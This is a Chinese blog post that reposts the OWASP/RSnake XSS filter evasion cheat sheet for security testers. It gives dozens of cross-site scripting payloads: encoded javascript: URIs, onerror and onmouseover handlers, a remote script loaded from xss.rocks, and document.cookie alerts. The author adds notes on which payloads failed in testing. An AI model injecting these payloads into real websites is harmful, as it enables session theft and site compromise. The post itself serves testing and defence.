<!DOCTYPE html>





<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.4.1">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.4.1">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.4.1">
  <link rel="mask-icon" href="/images/logo.svg?v=7.4.1" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.4.1">

<link rel="stylesheet" href="www.bootcdn.cn/css?family=Lato:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Roboto Mono:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">
  <link rel="stylesheet" href="/lib/pace/pace-theme-center-atom.min.css?v=1.0.2">
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.4.1',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"onmobile":false},
    copycode: {"enable":true,"show_result":true,"style":"mac"},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="今天继续XSS的进一步学习，以下内容转载自Freebuf上的文章，原文章来自OWASP的xss备忘录">
<meta name="keywords" content="WEB,CTF,XSS">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS绕过速查（一）">
<meta property="og:url" content="http://yoursite.com/2019/10/14/XSS绕过速查（一）/index.html">
<meta property="og:site_name" content="Gality&#39;s Blog">
<meta property="og:description" content="今天继续XSS的进一步学习，以下内容转载自Freebuf上的文章，原文章来自OWASP的xss备忘录">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-10-14T04:14:53.039Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS绕过速查（一）">
<meta name="twitter:description" content="今天继续XSS的进一步学习，以下内容转载自Freebuf上的文章，原文章来自OWASP的xss备忘录">
  <link rel="canonical" href="http://yoursite.com/2019/10/14/XSS绕过速查（一）/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>XSS绕过速查（一） | Gality's Blog</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>
    <a href="https://github.com/anbious/" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#64CEAA; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Gality's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">欢迎光临~随便坐</p>
      
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-about">
      
    

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-tags">
      
    

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-categories">
      
    

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a href="javascript:;" class="popup-trigger">
        
          <i class="fa fa-search fa-fw"></i>搜索</a>
      </li>
    
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
            

          <div id="content" class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/10/14/XSS绕过速查（一）/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Gality">
      <meta itemprop="description" content="这里记录着我的所学所想">
      <meta itemprop="image" content="https://s2.ax1x.com/2019/10/08/ufukdI.th.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Gality's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">XSS绕过速查（一）

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建时间：2019-10-14 00:18:34" itemprop="dateCreated datePublished" datetime="2019-10-14T00:18:34+08:00">2019-10-14</time>
            </span>
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/安全/" itemprop="url" rel="index"><span itemprop="name">安全</span></a></span>

                
                
              
            </span>
          

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
        
      
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2019/10/14/XSS绕过速查（一）/#comments" itemprop="discussionUrl"><span class="post-comments-count valine-comment-count" data-xid="/2019/10/14/XSS绕过速查（一）/" itemprop="commentCount"></span></a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>今天继续XSS的进一步学习，以下内容转载自Freebuf上的文章，原文章来自OWASP的xss备忘录</p>
<a id="more"></a>

<h2 id="1-介绍"><a href="#1-介绍" class="headerlink" title="1.介绍"></a>1.介绍</h2><p>这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP，内容基于他的XSS备忘录:<a href="http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站，将由OWASP维护和完善它。OWASP" target="_blank" rel="noopener">http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站，将由OWASP维护和完善它。OWASP</a>  的第一个防御备忘录项目：XSS (Cross Site Scripting)Prevention Cheat Sheet 灵感来源于  RSnake 的 XSS Cheat Sheet，所以我们对他给予我们的启发表示感谢。我们想要去创建短小简单的参考给开发者以便帮助他们预防  XSS漏洞，而不是简单的告诉他们需要使用复杂的方法构建应用来预防各种千奇百怪的攻击，这也是OWASP 备忘录系列诞生的原因。</p>
<h2 id="2-测试"><a href="#2-测试" class="headerlink" title="2.测试"></a>2.测试</h2><p>这份备忘录是为那些已经理解XSS攻击，但是想要了解关于绕过过滤器方法之间细微差别的人准备的。</p>
<p>请注意大部分的跨站脚本攻击向量已经在其代码下方给出的浏览器列表中进行测试。</p>
<h3 id="2-1-XSS定位器"><a href="#2-1-XSS定位器" class="headerlink" title="2.1.  XSS定位器"></a>2.1.  XSS定位器</h3><p>在大多数存在漏洞且不需要特定XSS攻击代码的地方插入下列代码会弹出包含“XSS”字样的对话框。使用URL编码器来对整个代码进行编码。<br>小技巧：如果你时间很紧想要快速检查页面，通常只要插入“&lt;任意文本&gt;”标签，然后观察页面输出是否明显改变了就可以判断是否存在漏洞(javascript中注入测试payload)：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">';alert(String.fromCharCode(88,83,83))//</span></span><br><span class="line"><span class="string">'</span>;alert(<span class="built_in">String</span>.fromCharCode(<span class="number">88</span>,<span class="number">83</span>,<span class="number">83</span>))<span class="comment">//";</span></span><br><span class="line">alert(<span class="built_in">String</span>.fromCharCode(<span class="number">88</span>,<span class="number">83</span>,<span class="number">83</span>))<span class="comment">//"</span></span><br><span class="line">;alert(<span class="built_in">String</span>.fromCharCode(<span class="number">88</span>,<span class="number">83</span>,<span class="number">83</span>))<span class="comment">//–</span></span><br><span class="line">&gt;&lt;/SCRIPT&gt;<span class="string">"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="2-2-XSS定位器（短）"><a href="#2-2-XSS定位器（短）" class="headerlink" title="2.2.  XSS定位器（短）"></a>2.2.  XSS定位器（短）</h3><p>如果你没有足够的空间并且知道页面上没有存在漏洞的JavaScript，这个字符串是一个不错的简洁XSS注入检查。注入后查看页面源代码并且寻找是否存在<strong>&lt;XSS</strong> 或<strong><code>&amp;lt;XSS</code></strong>字样来确认是否存在漏洞</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">”;!–”&lt;XSS&gt;=&amp;&#123;()&#125;</span><br></pre></td></tr></table></figure>

<h3 id="2-3-无过滤绕过"><a href="#2-3-无过滤绕过" class="headerlink" title="2.3.  无过滤绕过"></a>2.3.  无过滤绕过</h3><p>这是一个常规的XSS注入代码，虽然通常它会被防御，但是建议首先去测试一下。（引号在任何现代浏览器中都不需要，所以这里省略了它）：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT SRC=http:<span class="comment">//xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="2-4-利用多语言进行过滤绕过"><a href="#2-4-利用多语言进行过滤绕过" class="headerlink" title="2.4.  利用多语言进行过滤绕过"></a>2.4.  利用多语言进行过滤绕过</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'"&gt;&gt;&lt;marquee&gt;&lt;img src=x onerror=confirm(1)&gt;&lt;/marquee&gt;”&gt;&lt;/plaintext\&gt;&lt;/|\&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;plaintext/onmouseover=prompt(1)&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;script&gt;prompt(1)&lt;/script&gt;@gmail.com&lt;isindex formaction=javascript:alert(/XSS/) type=submit&gt;’–&gt;”&gt;&lt;/script&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;script&gt;alert(document.cookie)&lt;/script&gt;”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;img/id=”confirm&amp;lpar;1)”/alt=”/”src=”/”onerror=eval(id)&gt;’”&gt;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&lt;img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg“&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="2-5-通过JavaScript命令实现的图片XSS"><a href="#2-5-通过JavaScript命令实现的图片XSS" class="headerlink" title="2.5.  通过JavaScript命令实现的图片XSS"></a>2.5.  通过JavaScript命令实现的图片XSS</h3><p>图片注入使用JavaScript命令实现（IE7.0 不支持在图片上下文中使用JavaScript 命令，但是可以在其他上下文触发。下面的例子展示了一种其他标签依旧通用的原理）：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">"javascript:alert(‘XSS’);"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-6-无分号无引号"><a href="#2-6-无分号无引号" class="headerlink" title="2.6.  无分号无引号"></a>2.6.  无分号无引号</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=javascript:alert(‘XSS’)&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-7-不区分大小写的XSS攻击向量"><a href="#2-7-不区分大小写的XSS攻击向量" class="headerlink" title="2.7.  不区分大小写的XSS攻击向量"></a>2.7.  不区分大小写的XSS攻击向量</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=JaVaScRiPt:alert(‘XSS’)&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-8-HTML实体"><a href="#2-8-HTML实体" class="headerlink" title="2.8.  HTML实体"></a>2.8.  HTML实体</h3><p>必须有<strong>分号</strong>才可生效</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-9-重音符混淆"><a href="#2-9-重音符混淆" class="headerlink" title="2.9.  重音符混淆"></a>2.9.  重音符混淆</h3><p>如果你的JavaScript代码中需要同时使用单引号和双引号，那么可以使用重音符（`）来包含JavaScript 代码。这通常会有很大帮助，因为大部分跨站脚本过滤器都没有过滤这个字符：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">`javascript:alert(“RSnake says, ‘XSS’”)`</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-10-畸形的A标签"><a href="#2-10-畸形的A标签" class="headerlink" title="2.10.    畸形的A标签"></a>2.10.    畸形的A标签</h3><p>跳过HREF标签找到XSS的重点。。。由DavidCross提交~已在Chrome上验证</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a onmouseover=<span class="string">"alert(document.cookie)"</span>&gt;xxs link&lt;<span class="regexp">/a&gt;</span></span><br></pre></td></tr></table></figure>

<p>此外Chrome经常帮你补全确实的引号。。。如果在这方面遇到问题就直接省略引号，Chrome会帮你补全在URL或脚本中缺少的引号。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a onmouseover=alert(<span class="built_in">document</span>.cookie)&gt;xxs link&lt;<span class="regexp">/a&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="2-11-畸形的IMG标签"><a href="#2-11-畸形的IMG标签" class="headerlink" title="2.11.    畸形的IMG标签"></a>2.11.    畸形的IMG标签</h3><p>最初由Begeek发现（短小精湛适用于所有浏览器），这个XSS攻击向量使用了不严格的渲染引擎来构造含有IMG标签并被引号包含的XSS攻击向量。我猜测这种解析原来是为了兼容不规范的编码。这会让它更加难以正确的解析HTML标签：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG <span class="string">""</span><span class="string">"&gt;&lt;SCRIPT&gt;alert("</span>XSS<span class="string">")&lt;/SCRIPT&gt;"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-12-fromCharCode函数"><a href="#2-12-fromCharCode函数" class="headerlink" title="2.12.    fromCharCode函数"></a>2.12.    fromCharCode函数</h3><p>如果不允许任何形式的引号，你可以通过执行JavaScript里的fromCharCode函数来创建任何你需要的XSS攻击向量：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=javascript:alert(<span class="built_in">String</span>.fromCharCode(<span class="number">88</span>,<span class="number">83</span>,<span class="number">83</span>))&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-13-使用默认SRC属性绕过SRC域名过滤器"><a href="#2-13-使用默认SRC属性绕过SRC域名过滤器" class="headerlink" title="2.13.    使用默认SRC属性绕过SRC域名过滤器"></a>2.13.    使用默认SRC属性绕过SRC域名过滤器</h3><p>这种方法可以绕过大多数SRC域名过滤器。将JavaScript代码插入事件方法同样适用于注入使用elements的任何HTML标签，例如Form,Iframe,  Input,  Embed等等。它同样允许将事件替换为任何标签中可用的事件类型，例如onblur,onclick。下面会给出许多不同的可注入事件列表。由David  Cross提交，Abdullah Hussam(@Abdulahhusam)编辑。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=# onmouseover="alert('xxs')"&gt;</span><br></pre></td></tr></table></figure>

<p>实际测试中#不可用</p>
<h3 id="2-14-使用默认为空的SRC属性"><a href="#2-14-使用默认为空的SRC属性" class="headerlink" title="2.14.    使用默认为空的SRC属性"></a>2.14.    使用默认为空的SRC属性</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC= onmouseover=<span class="string">"alert('xxs')"</span>&gt;</span><br></pre></td></tr></table></figure>

<p>实际测试中浏览器会在src后加引号把onmouseover后的内容当作是src的内容，chrome，firefox和IE中都是，此条方法作废。</p>
<h3 id="2-15-使用不含SRC属性"><a href="#2-15-使用不含SRC属性" class="headerlink" title="2.15.    使用不含SRC属性"></a>2.15.    使用不含SRC属性</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG onmouseover=<span class="string">"alert('xxs')"</span>&gt;</span><br></pre></td></tr></table></figure>

<p>实际测试中无SRC会导致图片大小为0，无法用onmouseover触发，需要用src=/ 来使图片有大小进而触发onmouseover事件</p>
<h3 id="2-16-通过error事件触发alert"><a href="#2-16-通过error事件触发alert" class="headerlink" title="2.16.    通过error事件触发alert"></a>2.16.    通过error事件触发alert</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="regexp">/ onerror="alert(String.fromCharCode(88,83,83))"&gt;&lt;/img</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-17-对IMG标签中onerror属性进行编码"><a href="#2-17-对IMG标签中onerror属性进行编码" class="headerlink" title="2.17.    对IMG标签中onerror属性进行编码"></a>2.17.    对IMG标签中onerror属性进行编码</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x </span><br><span class="line">onerror=<span class="string">"&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-18-十进制HTML字符实体编码"><a href="#2-18-十进制HTML字符实体编码" class="headerlink" title="2.18.    十进制HTML字符实体编码"></a>2.18.    十进制HTML字符实体编码</h3><p>所有在IMG标签里直接使用javascript:形式的XSS示例无法在Firefox或Netscape8.1以上浏览器（使用Gecko渲染引擎）运行。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG  SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&gt; &amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-19-不带分号的十进制HTML字符实体编码"><a href="#2-19-不带分号的十进制HTML字符实体编码" class="headerlink" title="2.19.    不带分号的十进制HTML字符实体编码"></a>2.19.    不带分号的十进制HTML字符实体编码</h3><p>这对于绕过对“&#XX;”形式的XSS过滤非常有用，因为大多数人不知道最长可使用7位数字。这同样对例如<code>$tmp_string  =~s/.*\&amp;#(\d+);.*/$1/;</code>形式的过滤器有效，这种过滤器是错误的认为HTML字符实体编码需要用分号结尾（无意中发现的）：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG  SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</span><br></pre></td></tr></table></figure>

<p>我的电脑无法实现</p>
<h3 id="2-20-不带分号的十六进制HTML字符实体编码"><a href="#2-20-不带分号的十六进制HTML字符实体编码" class="headerlink" title="2.20.    不带分号的十六进制HTML字符实体编码"></a>2.20.    不带分号的十六进制HTML字符实体编码</h3><p>这是有效绕过例如<code>$tmp_string =~ s/.*\&amp;#(\d+);.*/$1/;</code>过滤器的方法。这种过滤器错误的认为#号后会跟着数字（十六进制HTML字符实体编码并非如此）</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG  SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-21-内嵌TAB"><a href="#2-21-内嵌TAB" class="headerlink" title="2.21.    内嵌TAB"></a>2.21.    内嵌TAB</h3><p>使用TAB来分开XSS攻击代码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=”jav ascript:alert(‘XSS’);”&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-22-内嵌编码后TAB"><a href="#2-22-内嵌编码后TAB" class="headerlink" title="2.22.    内嵌编码后TAB"></a>2.22.    内嵌编码后TAB</h3><p>使用编码后的TAB来分开XSS攻击代码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">"jav&amp;#x09;ascript:alert(‘XSS’);"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-23-内嵌换行分隔XSS攻击代码"><a href="#2-23-内嵌换行分隔XSS攻击代码" class="headerlink" title="2.23.    内嵌换行分隔XSS攻击代码"></a>2.23.    内嵌换行分隔XSS攻击代码</h3><p>一些网站声称09到13（十进制）的HTML实体字符都可以实现这种攻击，这是不正确的。只有09（TAB），10（换行）和13（回车）有效。查看ASCII字符表获取更多细节。下面几个XSS示例介绍了这些向量。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">"jav&amp;#x0A;ascript:alert(‘XSS’);"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-24-内嵌回车分隔XSS攻击代码"><a href="#2-24-内嵌回车分隔XSS攻击代码" class="headerlink" title="2.24.    内嵌回车分隔XSS攻击代码"></a>2.24.    内嵌回车分隔XSS攻击代码</h3><p>注意：上面使用了比实际需要长的字符串是因为0可以忽略。经常可以遇到过滤器解码十六进制和十进制编码时认为只有2到3位字符。实际规则是1至7位字符：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=<span class="string">"jav&amp;#x0D;ascript:alert(‘XSS’);"</span>&gt;</span><br></pre></td></tr></table></figure>

<h3 id="2-25-使用空字符分隔JavaScript指令"><a href="#2-25-使用空字符分隔JavaScript指令" class="headerlink" title="2.25.    使用空字符分隔JavaScript指令"></a>2.25.    使用空字符分隔JavaScript指令</h3><p>空字符同样可以作为XSS攻击向量，但和上面有所区别，你需要使用一些例如Burp工具或在URL字符串里使用%00，亦或你想使用VIM编写自己的注入工具（^V^@会生成空字符），还可以通过程序生成它到一个文本文件。老版本的Opera浏览器（例如Windows版的7.11）还会受另一个字符173（软连字符）的影响。但是空字符%00更加有用并且能帮助绕过真实世界里的过滤器，例如这个例子里的变形：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">perl -e <span class="string">'print "&lt;IMG SRC=java\0script:alert(\”XSS\”)&gt;";'</span> &gt; out</span><br></pre></td></tr></table></figure>

